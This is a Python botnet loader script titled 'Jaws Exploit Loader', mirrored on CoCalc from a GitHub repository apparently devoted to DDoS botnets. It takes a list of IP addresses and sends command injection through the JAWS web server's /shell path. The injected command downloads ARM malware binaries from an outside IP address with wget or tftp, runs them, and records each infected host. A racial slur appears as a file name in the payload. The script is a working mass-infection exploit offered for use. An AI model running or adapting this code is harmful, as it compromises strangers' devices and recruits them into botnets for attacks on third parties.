Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/JAWS/jaws_loader.py
5038 views
1
#Jaws Exploit Loader
2
import random, socket, time, sys, requests, re, os
3
from multiprocessing import Process
4
5
if len(sys.argv) < 2:
6
sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))
7
8
bin_names = ["ARM7", "ARM4"]
9
list = open(sys.argv[1], "r").readlines()
10
port = sys.argv[2]
11
12
def send_payload(target):
13
for names in bin_names:
14
print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names)
15
url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names)
16
try:
17
output = requests.get(url, timeout=3)
18
if output.status_code == int('200'):
19
print "[JAWS/1.0] infected %s" % (target)
20
file_h = open("jaws_infected.txt", "a+")
21
file_h.write(target + "\n")
22
file_h.close()
23
break
24
except:
25
pass
26
27
for i in open(sys.argv[1]).readlines():
28
try:
29
i = i.strip("\r\n")
30
t = Process(target=send_payload, args=(i,))
31
t.start()
32
except KeyboardInterrupt:
33
os.kill(os.getpid(), 9)
34
except:
35
pass
36